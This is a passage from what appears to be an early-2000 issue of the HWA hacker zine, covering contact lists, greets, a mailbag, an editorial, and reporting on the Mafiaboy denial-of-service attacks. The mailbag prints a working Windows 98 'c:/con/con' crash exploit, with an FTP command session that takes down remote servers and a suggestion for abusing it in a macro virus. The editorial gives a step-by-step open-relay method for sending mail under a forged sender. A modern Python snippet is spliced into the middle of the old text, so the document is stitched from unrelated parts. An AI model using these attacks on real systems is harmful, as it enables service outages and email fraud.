             residence for my collection, I collect stamps too so you kill
             two birds with one stone by being cool and mailing in a postcard,
             return address not necessary, just a  "hey guys being cool in
             Bahrain, take it easy" will do ... ;-) thanx.



    Ideas for interesting 'stuff' to send in apart from news:

    - Photo copies of old system manual front pages (optionally signed by you) 
    - Photos of yourself, your mom, sister, dog and or cat in a NON
      compromising position plz I don't want pr0n. <g>
    - Picture postcards
    - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
      tapes with hack/security related archives, logs, irc logs etc on em.
    - audio or video cassettes of yourself/others etc of interesting phone
      fun or social engineering examples or transcripts thereof.
    
    
    Stuff you can email:
    
    - Prank phone calls in .ram or .mp* format
    - Fone tones and security announcements from PBX's etc
    - fun shit you sampled off yer scanner 
    - reserved for one smiley face ->        :-)            <-
    - PHACV lists of files that you have or phac cd's you own (we have a burner)
    - burns of phac cds (email first to make sure we don't already have em)
    - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc 
    

    If you still can't think of anything you're probably not that interesting
    a person after all so don't worry about it <BeG>

    Our current email:

    Submissions/zine gossip.....: cruciphux@dok.org                                                                   
    Private email to editor.....: cruciphux@dok.org                                                                   
    Distribution/Website........: sas2@usa.net       
    
    Other methods:
    
    Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use 
    for lame questions!
    My Preferred chat method: IRC Efnet in #HWA.hax0r.news

    @HWA
    
    

00.2 THIS IS WHO WE ARE
     ~~~~~~~~~~~~~~~~~~
      
            __        ___                                      ___
            \ \      / / |__   ___   __ _ _ __ _____      ____|__ \
             \ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ /
              \ V  V / | | | | (_) | (_| | | |  __/\ V  V /  __/_|
               \_/\_/  |_| |_|\___/ \__,_|_|  \___| \_/\_/ \___(_)

 
      Some HWA members and Legacy staff
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      cruciphux@dok.org.........: currently active/editorial
      darkshadez@ThePentagon.com: currently active/man in black
      fprophet@dok.org..........: currently active/programming/IRC+ man in black
      sas2@usa.net .............. currently active/IRC+ distribution
      vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
      dicentra...(email withheld): IRC+ grrl in black
      twisted-pair@home.com......: currently active/programming/IRC+


      Foreign Correspondents/affiliate members (Active)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
       Qubik ............................: United Kingdom 
       D----Y ...........................: USA/world media
       Zym0t1c ..........................: Dutch/Germany/Europe
       Sla5h.............................: Croatia
       Spikeman .........................: World Media/IRC channel enforcer
       HWA members ......................: World Media
       Armour (armour@halcon.com.au).....: Australia 
       Wyze1.............................: South Africa
       Xistence..........................: German/Dutch translations
       
      
      
      Past Foreign Correspondents (currently inactive or presumed dead) 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       N0Portz ..........................: Australia           
       system error .....................: Indonesia           
       Wile (wile coyote) ...............: Japan/the East      
       Ruffneck  ........................: Netherlands/Holland 
       

       
       Please send in your sites for inclusion here if you haven't already
       also if you want your emails listed send me a note ... - Ed

      Spikeman's site is down as of this writing, if it comes back online it will be
      posted here.
      
      http://www.hackerlink.or.id/  ............ System Error's site (in Indonesian) 
      
      Sla5h's email: smuddo@yahoo.com
       

       *******************************************************************
       ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
       *******************************************************************

    :-p


    1. We do NOT work for the government in any shape or form. Unless you count 
       paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

    2. MOSTLY Unchanged since issue #1, although issues are a digest of recent 
       news events its a good idea to check out issue #1 at least and possibly 
       also the Xmas 99 issue for a good feel of what we're all about otherwise 
       enjoy - Ed ...


    @HWA



 01.0 Greets!?!?! yeah greets! w0w huh. - Ed
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                           ____               _
                          / ___|_ __ ___  ___| |_ ___
                         | |  _| '__/ _ \/ _ \ __/ __|
                         | |_| | | |  __/  __/ |_\__ \
                          \____|_|  \___|\___|\__|___/


     Thanks to all in the community for their support and interest but i'd
     like to see more reader input, help me out here, whats good, what sucks
     etc, not that I guarantee i'll take any notice mind you, but send in
     your thoughts anyway.
     
     
     New members/affiliates
     
     Xistence      .....        General news and Dutch/German translations
     
     sP|a|Zm       .....        Swedish news / translations
     
     SugarKing     .....        General news articles


       * all the people who sent in cool emails and support
       
     FProphet       Pyra                TwstdPair     _NeM_     
     D----Y         Dicentra            vexxation     sAs*
     Spikeman       p0lix               Vortexia      Wyze1     
     Pneuma         Raven               Zym0t1c       duro     
     Repluzer       astral              BHZ           ScrewUp     
     Qubik          gov-boi             _Jeezus_      Haze_     
     thedeuce       ytcracker           loophole      BlkOps     
     MostHated      vetesgirl           Slash         bob-
     CHEVY*         Debris              pr1zm         JimJones 
     Dragos Ruiu    pr0xy               MR^CHAOS      Eckis   
     Fuqrag         Messiah             v00d00        meliksah
     dinkee         omnihil             sP|a|Zm       OE
     KillNow        iPulse              erikR         prizm
     paluka         Xistence            doobee        phold hi ;)
     
     Folks from #hwa.hax0r.news and other leet secret channels,
     *grin* - mad props! ... ;-)
     
     And many others, sorry if i missed you or forgot you! mail
     me and i'll flail myself unforgivingly in front of my open
     bedroom window until I bleed, then maybe, add u to the list 
     (please, don't ask for pics...)
     
     Also mad props to doobee and the CCC (Chaos Computer Club)
     in Germany for setting up a new listserv system to help
     distribute the zine. (Will be in action soon, I have admin
     work to do first and testruns..).
     
     :-)))
     
     
               
     Ken Williams/tattooman ex-of PacketStorm,
     
     SpaceRogue for running a kick ass news net 
     
     Emmanuel Goldstein for pure staying power
     
     All the crackers, hackers and phreakers 
     
     The sysadmins, NOC controllers, network engineers
     IRCops, security professionals, tiger team operatives
     military cyberwar grunts, feds and 'special computer
     unit' coppers trying to keep shit together in this
     anarchic chaos.
          
     AND
     
     Kevin Mitnick (free at last, stay free this time man...)
     
     Kevin was released from federal prison on January 21st 2000
     for more information on his story visit http://www.freekevin.com/
     
     Recently reported 'helping' out the feds with security advice!
     
       
     
     
     kewl sites:
     
     + http://hackdesk.dhs.org/  NEW -> NEWBIE help + MORE
     + http://www.hack.co.za  NEW -> ** BACK ONLINE AS OF FEB 22ND **
       EfNet channel: #darknet    
                              
                                        
     + http://blacksun.box.sk. 
     + http://packetstorm.securify.com/ 
     + http://www.securityportal.com/ 
     + http://www.securityfocus.com/ 
     + http://www.hackcanada.com/
     + http://www.l0pht.com/
     + http://www.2600.com/
     + http://www.freekevin.com/
     + http://www.genocide2600.com/
     + http://www.hackernews.com/ (Went online same time we started issue 1!)
     + http://www.net-security.org/
     + http://www.slashdot.org/
     + http://www.freshmeat.net/
     + http://www.403-security.org/
     + http://www.pure-security.net/
     + http://ech0.cjb.net/

     @HWA


 01.1 Last minute stuff, rumours and newsbytes
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
          
                _   _                   ____        _
               | \ | | _____      _____| __ ) _   _| |_ ___ ___
               |  \| |/ _ \ \ /\ / / __|  _ \| | | | __/ _ Y __|
               | |\  |  __/\ V  V /\__ \ |_) | |_| | ||  __|__ \
               |_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/
                                              |___/

      
      

       "What is popular isn't always right, and what is right isn't
         always popular..."
                           - FProphet '99
                           
         
         
         
         Since we provide only the links in this section, be prepared
         for 404's - Ed        
         

    +++ When was the last time you backed up your important data?
    
          
     
      Thanks to myself for providing the info from my wired news feed and
      others from whatever sources, Zym0t1c and also to Spikeman for sending
      in past entries.... - Ed
      
     @HWA

 01.2 MAILBAG - email and posts from the message board worthy of a read
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      *** NEW WEB BOARD! ***
      
      ========================================================================
      
      The message board has been REVIVED with a new script and is doing quite
      well. Check it out
      
      
      http://discserver.snap.com/Indices/103991.html
      .      
      
      Don't be shy with your email, we do get mail, just not much of it 
      directed to other readers/the general readership. I'd really like to
      see a 'readers mail' section. Send in questions on security, hacking
      IDS, general tech questions or observations etc, hell we've even
      printed poetry in the past when we thought it was good enough to 
      share.. - Ed      
      
      =======================================================================
      
     
     From the Web board:
     
     Spies in the wires?
     ~~~~~~~~~~~~~~~~~~~
     
     Dissenter
     MILITARY SPYING?
     Fri Feb 25 08:10:56 2000


     I was surfing the net etc and noticed a connection
     on ports 1183, 1184, 1187 and 1188

     All from rbpki107.chamb.disa.mil

     I had visited sites like www.hack.co.za and
     www.pure-security.net ... coincidence?? 

     and WTF are these ports?? they don't show up in
     my /etc/services list.

     Dissenter
     
     -=-
     
     More spies in the wires?? (Aureate fiasco)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     TRDonJuan
     Advertising, reason for Spying?
     Sun Feb 27 10:39:02 2000


     http://www.freebox.com/zor/acid.txt
     http://www.freebox.com/zor/aureate.txt

     Check the two text files in the order i posted them.

     TRDonJuan
     
     -=-
     
     -=- email -=-
     
     
     
      From: Zoa_Chien <zoa_chien@??????.com>
      To: <cruciphux@dok.org>
      Sent: Friday, March 03, 2000 1:26 PM
      Subject: major security flaw in windoze 98
      
      
      New exploit found by the securax crew on 3/3/error (version 3)
      
      for: windoze 98 and probably 95 too...
      not for NT4 or win2K
      
      When we looked at the new exploit for ie that uses the image c:/con/con
      (http://www.zoomnet.net/~quick/error/crash.html)
      
      we experimented a bit with that unexisting path.
      We found that any program in windows 98 will crash if you try to open that 
      file.
      eg: try Start --> run --> c:/con/con
      or open in Word the non-existing document c:/con/con
      both attempts will result in a Blue Screen of Death and a lockup.
       
       
      This can also be exploited to crash remote servers
      Look what we tried on this servU-FTP v 2.4a
      (works on any windoze 98 FTP even with anonymous or guest account)
      
      it looked something like this:
      
      230 user logged in, proceed
      SYST
      215 UNIX TYPE:L8
      connect ok!
      PWD
      257 "c:/home" is current directory.
      haal directory op
      TYPE A
      200 Type set to A.
      PORT xx.xx.xx.xx :-)
      200 PORT Command succesful
      LIST
      150 Opening ASCII mode data connect
      Download: 86 bytes
      Wacht op de server
      226 transfer complete
      CDUP
      250 directory changed to /c:/
      PWD
      250 "/c:/" is current directory
      CWD /con/con --> this does the trick
      
      ...
      no more response :-)  server crashed.
       
       
      This is probably just the beginning of a new series of exploits for windoze.
      also vulnerable :
       
      samba server requires some programming NOT TESTED YET
      http server TESTED with www.server.com/con/con
      we tried to fake a dcc send with the name "con/con" in irc but it didn't 
      work due to the "/"
      (maybe if someone tries "%47" instead of "/")
       
       
      this little flaw could easily be used in a macro virus. may even be placed 
      in the registry to annoy people
       
      HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open
      c:\con\con "%1" %*
       
       
      Da G#Df@RTER & Pathos (securax)
       
      www.securax.org
      
      -=-
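A server-side guard against the c:/con/con crash reported in the email above, as an added example that is not part of the email or Securax's work: it rejects any requested path (FTP CWD argument, HTTP URL path) that has a DOS device name as one of its components before the path reaches the filesystem. The function names and the sample requests are constructed for illustration.

```python
"""Reject request paths that name a DOS device (added example)."""
from urllib.parse import unquote

# Device names that DOS/Windows reserves in every directory.
RESERVED = {"CON", "PRN", "AUX", "NUL", "CLOCK$"}
RESERVED |= {f"COM{i}" for i in range(1, 10)}
RESERVED |= {f"LPT{i}" for i in range(1, 10)}


def fully_decode(raw_path, max_rounds=3):
    """Undo percent-encoding repeatedly so double encoding cannot hide a name."""
    path = raw_path
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def reserved_components(raw_path):
    """Return the path components that resolve to a reserved device name."""
    # Decode first: an encoded separator must be split like a literal one.
    path = fully_decode(raw_path).replace("\\", "/")
    hits = []
    for part in path.split("/"):
        # Trailing dots and spaces are ignored by Win32, and "NUL.txt" still
        # refers to the NUL device, so only the name before the first dot counts.
        base = part.rstrip(". ").split(".", 1)[0].rstrip(" ").upper()
        # "CON:" and "C:CON" are device references too.
        base = base.rstrip(":")
        if ":" in base:
            base = base.rsplit(":", 1)[1]
        if base in RESERVED:
            hits.append(part)
    return hits


def allow_path(raw_path):
    """True when no component of the requested path is a device name."""
    return not reserved_components(raw_path)


# Constructed sample requests: the two forms from the email plus variants.
SAMPLE_REQUESTS = [
    "/con/con",               # FTP "CWD /con/con" from the email
    "C:\\CON\\CON",           # same path with backslashes and a drive letter
    "/files/nul.txt",         # device name with an extension
    "/a/%2563on/x",           # double percent-encoded "con"
    "con%2Fcon",              # encoded path separator
    "/console/contents.html", # ordinary names that merely start with "con"
    "/pub/readme.txt",
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        verdict = "allow" if allow_path(request) else "REJECT"
        print(f"{verdict:6} {request!r} -> {reserved_components(request)}")
```

Run the check on the decoded path the server will actually open, and log rejected requests: a device name in a request path has no legitimate use.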
      
       
     
          
     

      

 02.0 From the editor.
      ~~~~~~~~~~~~~~~~
      
                        _____    _ _ _             _
                       | ____|__| (_) |_ ___  _ __( )__
                       |  _| / _` | | __/ _ \| '__|/ __|
                       | |__| (_| | | || (_) | |   \__ \
                    ___|_____\__,_|_|\__\___/|_|   |___/
                   / ___|  ___   __ _ _ __ | |__   _____  __
                   \___ \ / _ \ / _` | '_ \| '_ \ / _ \ \/ /
                    ___) | (_) | (_| | |_) | |_) | (_) >  <
                   |____/ \___/ \__,_| .__/|_.__/ \___/_/\_\
                                     |_|

      

     #include <stdio.h>
     #include <thoughts.h>
     #include <backup.h>

     main()
         {
           printf ("Read commented source!\n\n");

         /* Where have we been? life and personal problems.
          * now passed. Working towards re-establishing
          * equilibrium and peace in our processes...
          *
          * Possible partnership with the IBT team on the horizon          
          * also CCC has kindly offered listserver resources to
          * distribute the zine directly to subscribed members
          * thanks to doobee and the world renowned Chaos Computer
          * Club in Germany. 
          * 
          * "danke meine CCC-Freunde vom HWA-Personal!"
          *
          * Cruci
          *
          * cruciphux@dok.org
          * Preferred chat method: IRC Efnet in #HWA.hax0r.news
          *
          */
           
     printf ("EoF.\n");
           }
           
           
           
           
      Snailmail:
            
            HWA NEWS
	    P.O BOX 44118
	    370 MAIN ST. NORTH
	    BRAMPTON, ONTARIO
	    CANADA
	    L6V 4H5     
	    
	    
      Anonymous email:
      
      telnet (wingate ip) (see our proxies list)
      Wingate>0.0.0.0
      Trying 0.0.0.0...
      Connected to target.host.edu
      Escape character is '^]'.
      220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST)
      HELO bogus.com
      250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you
      MAIL FROM: admin@nasa.gov
      250 admin@nasa.gov... Sender ok
      RCPT TO: cruciphux@dok.org
      250 cruciphux@dok.org... Recipient ok
      DATA
      Secret cool infoz
      .
      QUIT
      
      If you got that far everything is probably ok, otherwise you might see
      550 cruciphux@dok.org... Relaying denied
      
      or
      
      550 admin@nasa.gov... Domain must exist
      
      etc.
      
      
      
      * This won't work on a server with up to date rule sets denying relaying and your
        attempts will be logged so we don't suggest you actually use this method to
        reach us, its probably also illegal (theft of service) so, don't do it. ;-)
        
      -=-     

      

      Congrats, thanks, articles, news submissions and kudos to us at the
         
      main address: cruciphux@dok.org complaints and all nastygrams and
         
      mailbombs can go to /dev/nul nukes, synfloods, trinoo and tribe
      or ol' papasmurfs to  127.0.0.1, 
      
      private mail to cruciphux@dok.org

     danke.

     C*:.
     
     -= start =--= start =--= start =--= start =--= start =--= start =--= start 
   
     
                       ____            _             _
                      / ___|___  _ __ | |_ ___ _ __ | |_
                     | |   / _ \| '_ \| __/ _ \ '_ \| __|
                     | |__| (_) | | | | ||  __/ | | | |_
                      \____\___/|_| |_|\__\___|_| |_|\__|
                           / ___|| |_ __ _ _ __| |_
                           \___ \| __/ _` | '__| __|
                            ___) | || (_| | |  | |_
                           |____/ \__\__,_|_|   \__|

             
     
                            
      -= start =--= start =--= start =--= start =--= start =--= start =--= 
      
      
      
     
03.0 Who are Hackers anyway?
     ~~~~~~~~~~~~~~~~~~~~~~~
     
     http://www.usnews.com:80/usnews/issue/990614/14blac.htm
     
     Business & Technology  6/14/99
     
     
     SPECIAL REPORT
     
     Who are hackers, anyway?
     
     The computer underground says that it is misunderstood
     
     BY BRENDAN I. KOERNER
     
     Hacker. 
     
     The very word conjures up images of nihilistic teenagers hellbent on 
     destruction of reckless, restive nerds just one keystroke away from 
     starting World War III. To hear the hackers themselves tell it, however,
     nothing could be further from the truth.
     
     True, there are bad-seed "crackers" among their ranks. But members of 
     the computer underground dismiss the negative stereotypes as the lies 
     of a pandering media. Instead, they claim that true hackers are interested
     not in destruction but in technology, and that they circumvent security only
     to help improve it. "People say hackers want to destroy networks," says 
     "mosthated," who was rousted by the FBI over Memorial Day weekend. "But 
     most people do it for knowledge. It's for the fun."
     
     In his own hacking career, mosthated claims to have carefully followed the
     community's famed ethic, which frowns upon needless defacements and network
     trashing. Instead, he leaves notes for system administrators, detailing their
     holes. "We broke into a site the summer of last year, and I left my E-mail 
     address," he says. "I helped the system administrator set up some mail 
     servers."
     
     No malicious intent. As a rule, hackers don't like crackers. In fact, the 
     group that recently defaced the White House Web page has been castigated by
     many peers. Mike McCloskey of Klein Associates, a research firm that has been
     commissioned by the U.S. military to study the psychology of hackers, concurs
     that most hackers lack malicious intent. "They have an inherent interest in 
     technology," he says. They are also motivated by ideals. "They don't like the
     idea that information is private," adds Terry Stanard, also of Klein Associates,
     echoing a crucial mantra of the underground: "Information wants to be free."
     
     But the temptation to play King of the Cybermountain sometimes pushes people to
     cross the blurry boundary between hacker and cracker. "A lot of what they do is
     to get the attention of the press or to get the attention of their peer group,"
     continues Stanard. "It's almost like a popularity contest that you encounter in
     grade school." If that means taking down a heavy-traffic site and posting 
     profanity-laced diatribes, or downloading files from NASA, so be it.
     
     There is certainly a rush associated with infiltrating sites and servers. 
     "It's sort of an addictive thing," says McCloskey. "You can hack into a 
     high-level site and put in a back door, and you get more and more access."
     That addiction can become all encompassing for some. "LoopHole," another 
     target of the FBI raids, knows of many who become hopelessly obsessed, 
     dedicating every hour of every day to the pursuit of access. 
     "That's all they do," says LoopHole, who claims membership in the 
     underground group "Hydro hoax programmers."
     
     A number of hackers underachieve in school, something they often blame on 
     curricula that don't cater to their unique interests. "A lot of people drop out,
     'cause there's really nothing you can learn in school," says mosthated, 
     a dropout himself. "At my school, they only had two computer classes, and one
     was learning databases."
     
     By the time they reach adulthood, many hackers fantasize about going legit,
     turning their years of practice into healthy salaries as systems 
     administrators or security advisers. Mosthated, for example, has a job 
     offer, the chance to do remote security for a small Internet service 
     provider in Denver; he's also got his heart set on designing his own 
     network with the aid of a programmer in Belgium.
     
     Of course, not all hackers end up in corporate cubicles. Tempted by 
     businesses offering cash in exchange for stolen information, some of
     them are going over to the dark side. "There are people out there who do
     hacking for hire," admits mosthated, who says everyone on the Internet is
     talking about a few individuals who have offered big bucks in exchange for
     proprietary secrets.
     
     Yet financial gain is rarely on the mind of hackers, many of whom are too
     young to dream of purchasing anything grander than a compact disk. Boredom
     is the enemy, and in the era of the two-computer family, hacking is the 
     answer. "A lot of these kids are 14, 15, 16 years old," says Mike Hudack,
     editor of Aviary-mag.com. "They don't have anything else to do." To the 
     companies whose sites get trashed in the course of curing that boredom, 
     however, "harmless" and "hacker" are mutually exclusive terms.
     
     @HWA
     


04.0 Mr DoS: Mafiaboy isn't done baring his teeth (Vetesgirl) & ABC
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     Info and article snarfed from Vetesgirl's site
     http://www.self-evident.com/
     
     Also includes an article from ABCNews.
     http://www.abcnews.go.com/sections/tech/DailyNews/webattacks000217.html       
     
     -=- 80 col mode formatting turned off to post this data raw -=-
     
     
     MafiaBoy Attacks Vetesgirls site after article on him appears there:
     
     
     I was dos'd my nick was bot'd on www.titanicpussy.com by mafiaboy/anon 
     he then down'd www.self-evident.com for 8 hours. this is a log of him 
     talking to me before i was attacked. 
     ------------------------------------------------------------ 
     MSG 02/13/00 at 09:57:47 PM anon (anonymous@s86-73.resnet.u cla.edu) just
     MSG 02/13/00 at 09:57:49 PM anon (anonymous@s86-73.resnet.u cla.edu) who do you think you are
     MSG 02/13/00 at 09:57:51 PM anon (anonymous@s86-73.resnet.u cla.edu) putting my name
     MSG 02/13/00 at 09:57:53 PM anon (anonymous@s86-73.resnet.u cla.edu) on your fucking webpage
     MSG 02/13/00 at 09:58:47 PM anon (anonymous@s86-73.resnet.u cla.edu) mafiaboy
     MSG 02/13/00 at 09:59:07 PM anon (anonymous@s86-73.resnet.u cla.edu) you think your fucking cool or something
     MSG 02/13/00 at 09:59:25 PM anon (anonymous@s86-73.resnet.u cla.edu) fucking posting my name abouts
     MSG 02/13/00 at 09:59:27 PM anon (anonymous@s86-73.resnet.u cla.edu) something serious
     MSG 02/13/00 at 09:59:29 PM anon (anonymous@s86-73.resnet.u cla.edu) yah you dumb whore
     MSG 02/13/00 at 09:59:41 PM anon (anonymous@s86-73.resnet.u cla.edu) no im gonna continue
     MSG 02/13/00 at 09:59:45 PM anon (anonymous@s86-73.resnet.u cla.edu) by hitting your fucking page
     MSG 02/13/00 at 09:59:49 PM anon (anonymous@s86-73.resnet.u cla.edu) dont fucking put it on a website
     MSG 02/13/00 at 10:00:24 PM anon (anonymous@s86-73.resnet.u cla.edu) you dumb whore
     MSG 02/13/00 at 10:00:31 PM anon (anonymous@s86-73.resnet.u cla.edu) fucking trying to get me into trouble
     MSG 02/13/00 at 10:01:47 PM anon (anonymous@s86-73.resnet.u cla.edu) this is the real mafiaboy
     MSG 02/13/00 at 10:01:49 PM anon (anonymous@s86-73.resnet.u cla.edu) believe me
     MSG 02/13/00 at 10:03:29 PM anon (anonymous@s86-73.resnet.u cla.edu) if www.nasa.gov
     MSG 02/13/00 at 10:03:31 PM anon (anonymous@s86-73.resnet.u cla.edu) thinks your packeting them
     MSG 02/13/00 at 10:03:41 PM anon (anonymous@s86-73.resnet.u cla.edu) have a nice day
     MSG 02/13/00 at 10:04:27 PM anon (anonymous@s86-73.resnet.u cla.edu) all you can do
     MSG 02/13/00 at 10:04:29 PM anon (anonymous@s86-73.resnet.u cla.edu) is fucking email
     MSG 02/13/00 at 10:06:21 PM anon (anonymous@s86-73.resnet.u cla.edu) like i care what u call "real hackers"
     MSG 02/13/00 at 10:06:29 PM anon (anonymous@s86-73.resnet.u cla.edu) thats why i get msged everyday
     MSG 02/13/00 at 10:06:37 PM anon (anonymous@s86-73.resnet.u cla.edu) from every fucking hacker on efnet
     MSG 02/13/00 at 10:07:35 PM anon (anonymous@s86-73.resnet.u cla.edu) AND IM TELLING YOU
     MSG 02/13/00 at 10:07:43 PM anon (anonymous@s86-73.resnet.u cla.edu) I AM D O S I N G YOUR WEBPAGE
     MSG 02/13/00 at 10:07:45 PM anon (anonymous@s86-73.resnet.u cla.edu) TO THE SHITS
     MSG 02/13/00 at 10:07:57 PM anon (anonymous@s86-73.resnet.u cla.edu) just
     MSG 02/13/00 at 10:07:59 PM anon (anonymous@s86-73.resnet.u cla.edu) who do you think you are
     MSG 02/13/00 at 10:07:59 PM anon (anonymous@s86-73.resnet.u cla.edu) putting my name
     MSG 02/13/00 at 10:07:59 PM anon (anonymous@s86-73.resnet.u cla.edu) on your fucking webpage
     MSG 02/13/00 at 10:10:43 PM anon (anonymous@s86-73.resnet.u cla.edu) fuck ur gay ass site
     MSG 02/13/00 at 10:13:45 PM anon (anonymous@s86-73.resnet.u cla.edu) i have respect
     MSG 02/13/00 at 10:13:45 PM anon (anonymous@s86-73.resnet.u cla.edu) u have none     
     
     -=- 80 col mode returns -=-

     

     MafiaBoy  by VetesGirl
     ~~~~~~~~~~~~~~~~~~~~~~
     
     Mafiaboy attacked self-evident due to this article we were down 8 hours, here is
     what he said before the attack after the attack I received logs of mafiaboy in #!tnt 
     RCMP has the real name and address of mafiaboy it was on Toronto Radio this
     morning and they probably already have him in custody. A friend of mine who has
     close ties to the FBI passed the info on to them about mafiaboy. I know HNN was
     not interested in this story and said  This is what I think [12:55] [anon] what can irc
     prove[12:55] [anon] i can be bluffing - HNN  I replied bluffing = 8 hours of down
     time oh okay... I could care less about it getting published I was just wanting you to 
     know mafiaboy was capable of the attack and that I have known mafiaboy for years.
     Wasn't it mitnick or poulsen who was tracked  with irc?  I was surprised that HNN
     didn't know that Mitnick was tracked on irc that was one of  Mitnicks unusual tools .
     GayPee at antionline.org got some publicity and as always his information was
     incorrect. I don't know where gaypee gets his info but its not a good source. People
     who know mafiaboy does know he was capable of it and was behind some of the
     attacks. Even the fbi believes it was Mafiaboy and so do Canada authorities. Wired
     News did a lot of investigating and did many follow ups and has the most accurate
     news, they did not discard any statement they received.  Mafiaboy was dumb
     enough to go from person to person on efnet bragging about how he took this and
     that server down and also had a channel asking users to give him fast servers so he
     could show off and take the servers down, with  the Feds watching him he had the
     nerve to DoS me go to a hacked shelled titanicpussy.com and bot my nick there and
     then he attacked Self-Evident for 8 hours. Mafiaboy should have known he had a lot
     of enemies on irc  because of his attacks on them and that his real name and address
     were easy to get because he was Legit once http://www.dsuper.net/~mafiaboy was
     one of his legit accounts. Mafiaboy is caught up in getting recognition and in my
     opinion is a Packet Warrior who used Remote Exploits to gain entry and then use
     that server for DoS/Bot/Bnc. Last year he was begging for shells and didn't even
     know how to find suids on a box, he may have learnt more since then but I seriously
     doubt it, He liked being on Efnet showing off his packet skills, taking channels and
     terrorizing those who would NOT bow down to him, much like bionic except bionic
     had more skill than him.. Self-Evident was attacked because of this article -
     Mafiaboy who is a member of tnt on efnet #exceed, #shells, #carding, #!tnt is
     claiming he was the one behind the attacks on ebay, yahoo and Amazon.com. 
     Mshadow stated he has logs of it all and confirmed it was Mafiaboy.  Hackers and
     Security Pros have said the people behind this are NOT hackers and are probably
     socially retarded, with a need to control others much like the shooters of Columbine
     High school.      
     
     
     -=-
     
     (Sorry for nasty formatting, it looks awful without manually re-writing it 
     and I'm not going to do that, started but, gave up .... - Ed)
     
         
     
      ABCNews:

      http://www.abcnews.go.com/sections/tech/DailyNews/webattacks000217.html       
      (Link has video clip available for this story also. - Ed)

      Mafiaboy Suspected

 
      FBI Has Evidence That He and Others Launched Web Attacks, Expert Says 

      Sen. Patrick Leahy, D-Vt., left, and Sen.  Judd Gregg, R-N.H., question       
      FBI Director Louis Freeh and Attorney General Janet Reno during a hearing 
      on federal law enforcement efforts to track down the culprits who 
      sabotaged several leading Web sites. (J. Scott Applewhite/AP Photo)

 

 

     By Jonathan Dube

     Feb. 17 - A hacker who calls himself "mafiaboy" is believed to be responsible
     for at least two of the attacks on leading Web sites, a security expert 
     tells ABCNEWS.com. Chat room logs now in the possession of the FBI show 
     that mafiaboy asked others what sites he should take down before the sites 
     were attacked, Internet security expert Michael Lyle said. 

      In a later conversation with Lyle, mafiaboy claimed credit for attacking      
      CNN.com, E*TRADE and several  smaller sites, and he shared technical 
      information that only someone involved in the attacks would know, Lyle 
      said. 

          The FBI now has reason to believe that the attacks last week that      
          took down seven leading Web sites and at least six smaller Web sites 
          were launched by several people, acting independently. Mafiaboy, who 
          has been described as a 15-year-old Canadian, is believed to be a 
          copycat who launched his attacks only after Yahoo! was knocked offline 
          on Feb. 7. 

     Mafiaboy's Claims Seem Credible

     Dozens of hackers have claimed credit for the attacks in online chats, 
     but Lyle says mafiaboy is the only one so far who appears to be credible. 

          "Mafiaboy was saying 'What should I hit next? What should I hit 
          next?' and people on the channel were suggesting sites, and mafiaboy 
          was saying, 'OK, CNN,'" said Lyle, the chief technology officer for 
          Recourse Technologies Inc., an Internet security company in Palo Alto, 
          Calif. "And shortly thereafter the people on the channel would be 
          talking about CNN going down. If you look at the time stamps on the 
          logs, they also coincide with CNN going down."

          Lyle said the log files show similar discussions prior to the Feb. 9 
          attacks on E*TRADE and several other smaller sites. 

          Chat room log files can be faked, but Lyle said he's spoken with 
          a number of others who witnessed the conversations live and verified 
          their authenticity. 

     Mafiaboy Knows Details

     Moreover, Lyle said he spoke with mafiaboy over 
     the Internet last Thursday and again last Friday and those conversations 
     bolstered the evidence against the young hacker. Mafiaboy also said he was 
     breaking into computers that were using a program called WUFTP, which is 
     often used to exchange data on university computers, Lyle said. Mafiaboy 
     said these computers were using an old version of WUFTP that had security 
     flaws in it and thus he was able to install the attack software on the 
     computers, Lyle said. He is believed to have installed attack software 
     called Tribal Flood Network, or TFN, on dozens of computers, making them 
     into zombies that he could then instruct to launch the attacks. Lyle said 
     mafiaboy told him specific details about the ports that he used to connect 
     with the zombie computers and launch the attacks - information that only 
     someone involved in the attack would know. 

     More Than One Attacker

     The reason investigators believe different 
     culprits were responsible for some of the attacks is that the software 
     tools used to launch the attacks on Yahoo! and eBay were different than 
     those used to attack CNN.com and E*TRADE, Lyle said. The attacks on CNN.com 
     and E*TRADE are believed to have been launched using TFN, a software 
     program that's widely available on the Internet. The attacks on Yahoo! and 
     eBay were launched using a more sophisticated set of tools, he said. 
     Toronto-based Internet service provider Internet Direct said the Royal 
     Canadian Mounted Police had warned it that a subscriber called mafiaboy 
     previously held two accounts with Delphi Supernet, a Montreal ISP the 
     company bought last year. The accounts were closed in March 1998 because 
     mafiaboy violated subscriber policies, but Internet Direct would not say 
     what the violations entailed. Lyle says he has turned his information over 
     to the FBI and has been working with investigators. Based on his 
     conversations with mafiaboy, Lyle said the teen likely committed the 
     attacks to boost his notoriety within the hacker community. "There's this 
     real effort among the people on all these channels to try and stand out and 
     look like the best hacker, or one of the best," Lyle said. "And I think 
     that that's what he was searching after. That really explains why he would 
